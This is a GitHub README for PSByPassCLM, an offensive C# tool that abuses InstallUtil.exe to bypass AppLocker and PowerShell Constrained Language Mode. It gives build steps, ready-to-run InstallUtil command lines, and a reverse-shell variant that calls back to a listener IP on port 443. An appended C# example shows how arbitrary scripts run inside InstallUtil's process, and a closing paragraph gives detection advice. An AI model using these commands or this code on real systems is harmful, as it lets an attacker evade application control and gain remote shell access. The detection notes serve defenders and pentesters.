# PSByPassCLM
Bypass for PowerShell Constrained Language Mode

Repository: https://github.com/padovah4ck/PSByPassCLM (GitHub, language C#, default branch master, last pushed 2021-12-23)  
Topics: bypass, c-sharp, constraint-language, installutil, powershell, powershell-language-mode

## Description and references
This technique might come in handy whenever you're stuck in a low-privilege PowerShell console and the PowerShell version 2 engine is not available to perform a [PowerShell downgrade attack](http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/).

That is the normal situation on modern Windows OSes (Windows 10, Windows Server 2016, ...), which ship with AppLocker and PowerShell version 5 (v5). With AppLocker in Allow mode, PowerShell v5 puts the console into Constrained Language Mode (CLM), and an attacker cannot simply switch the session back to FullLanguage in order to run attack tools. Losing the core language functionality (loading a script in memory, calling arbitrary .NET types, and so on) is a real obstacle.

"PowerShell v5 detects when AppLocker Allow mode is in effect and sets the PowerShell language to Constrained Mode, severely limiting the attack surface on the system. With AppLocker in Allow mode and PowerShell running in Constrained Mode, it is not possible for an attacker to change the PowerShell language mode to full in order to run attack tools." [[Source]](https://adsecurity.org/?p=2604)

## Build the binary
The project is written in C#. All the source (only a few lines of code) is committed: .csproj, .sln, ...  
IDE: Visual Studio 2015. You should be able to compile and build the binary with the default configuration (Debug/x64).
The only thing you may have to fix is the System.Management.Automation reference, which points at the copy in the GAC:
```dos
C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
```

## Usage
Nothing new here: we use the old and well-known "InstallUtil.exe" trick to bypass AppLocker. InstallUtil.exe is a Microsoft-signed .NET Framework utility that lives under the Windows directory, so the default AppLocker executable rules allow it. With the /U (uninstall) switch it loads the file you give it as a .NET assembly and runs the Uninstall method of every class in it marked [RunInstaller(true)], so your code runs inside InstallUtil's own process rather than inside powershell.exe. Once you've compiled the binary, issue one of the commands below on the target host.

Besides, your binary doesn't have to be an "exe": InstallUtil.exe loads the file as an assembly whatever its extension, so the same payload renamed to .txt or .bin works as well.

This one opens a subshell in the current console:
```dos
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /U c:\temp\psby.exe
```

This one tries to open a PowerShell reverse shell (bound into the source as a life saver); replace the /rhost and /rport values with your listener:
```dos
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.13.206 /rport=443 /U c:\temp\psby.exe
```

`/logfile=` with an empty value disables the installer log file and `/LogToConsole=true` sends the output to the console. `/revshell`, `/rhost` and `/rport` are not InstallUtil options: InstallUtil passes any extra `/name=value` switch through to the installer class, which reads them from its context.

## Testing
Tested on the following environment (Windows Server 2016)
![Screenshot](img/clm01.JPG?raw=true)

![Screenshot](img/clm02.JPG?raw=true)

PS process in current console
![Screenshot](img/clm03.JPG?raw=true)

Trying to open PS reverse shell
![Screenshot](img/clm04.JPG?raw=true)

Got the shell
![Screenshot](img/clm05.JPG?raw=true)


## Useful Links
https://blogs.msdn.microsoft.com/powershell/2017/11/02/powershell-constrained-language-mode/  
https://adsecurity.org/?p=2604  
https://pentestn00b.wordpress.com/2017/03/20/simple-bypass-for-powershell-constrained-language-mode/  
https://blog.stealthbits.com/how-attackers-are-bypassing-powershell-protections/  
https://decoder.cloud/2017/11/17/we-dont-need-powershell-exe-part-3/  


## Author
This code is developed by Chris D. [@padovah4ck](https://twitter.com/padovah4ck) // [LinkedIn](https://www.linkedin.com/in/chrisdanieli/) //  
Use it at your own risk. No responsibility on my side.


---

![Beer](https://icons.iconarchive.com/icons/flat-icons.com/flat/48/Beer-icon.png)  [Buy me a beer if you like ;-)](https://www.buymeacoffee.com/padovah4ck)
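The following is an added illustration of the InstallUtil /U mechanism the Usage section relies on. It is example code written for this page, not the PSByPassCLM project's own source, and the namespace `ClmProbe`, the class names `ProbeInstaller` and `HostedRunspace`, the output file name `ClmProbe.dll` and the `/script=` switch are all assumptions of the example (the switch is a custom parameter read from the installer context, not an InstallUtil option). The example deliberately reports the language mode the hosted runspace actually gets instead of assuming FullLanguage, because PowerShell 5 evaluates its lockdown policy inside any host that loads System.Management.Automation.

```csharp
// Added illustration, not the PSByPassCLM project's source.
// Build: .NET Framework 4.x class library referencing System.Configuration.Install
//        and the GAC copy of System.Management.Automation (path in the Build section).
// Run:   InstallUtil.exe /logfile= /LogToConsole=true /script="Get-Process -Id $PID" /U ClmProbe.dll
using System;
using System.Collections;
using System.Collections.Generic;
using System.ComponentModel;
using System.Configuration.Install;
using System.Management.Automation;
using System.Management.Automation.Runspaces;

namespace ClmProbe
{
    // InstallUtil.exe /U <file> loads the file as an assembly, instantiates every
    // public class marked [RunInstaller(true)] and calls its Uninstall() method.
    [RunInstaller(true)]
    public class ProbeInstaller : Installer
    {
        public override void Uninstall(IDictionary savedState)
        {
            // Extra /name=value switches on the InstallUtil command line are not
            // rejected; they land in Context.Parameters. "/script=" is a hypothetical
            // parameter of this example, not an InstallUtil option.
            string script = Context.Parameters.ContainsKey("script")
                ? Context.Parameters["script"]
                : "$env:COMPUTERNAME";

            // Measure the language mode rather than assume FullLanguage: PowerShell 5
            // applies its lockdown policy (AppLocker/WDAC script enforcement and the
            // __PSLockdownPolicy variable) inside any host that loads System.Management.Automation.
            Console.WriteLine("Hosted runspace language mode: " + HostedRunspace.LanguageMode());

            foreach (string line in HostedRunspace.Run(script))
                Console.WriteLine(line);
        }
    }

    public static class HostedRunspace
    {
        // Asks the hosted engine which language mode it is running in.
        public static string LanguageMode()
        {
            IList<string> output = Run("$ExecutionContext.SessionState.LanguageMode.ToString()");
            return output.Count > 0 ? output[0] : "unknown";
        }

        // Runs a script in a fresh runspace owned by this process and returns each
        // output object as text; records from the error stream are appended as text too.
        public static IList<string> Run(string script)
        {
            var lines = new List<string>();
            using (Runspace rs = RunspaceFactory.CreateRunspace())
            {
                rs.Open();
                using (PowerShell ps = PowerShell.Create())
                {
                    ps.Runspace = rs;
                    ps.AddScript(script);
                    foreach (PSObject o in ps.Invoke())
                        lines.Add(o == null ? string.Empty : o.ToString());
                    foreach (ErrorRecord e in ps.Streams.Error)
                        lines.Add("ERROR: " + e.ToString());
                }
            }
            return lines;
        }
    }
}
```

Because the output goes to `Console`, the `/LogToConsole=true` switch from the Usage section is what makes it visible. If the hosted runspace prints FullLanguage while a normal powershell.exe on the same box reports ConstrainedLanguage, the bypass the README describes is in effect on that host. On the defensive side, the signal to hunt for is InstallUtil.exe started with a `/U` argument pointing at a file outside the usual installer locations (or with a non-.exe/.dll extension), which process creation logging with command-line capture (Windows event 4688 or Sysmon event 1) records; AppLocker DLL rules, which are off by default, and WDAC are the controls that cover assemblies loaded this way.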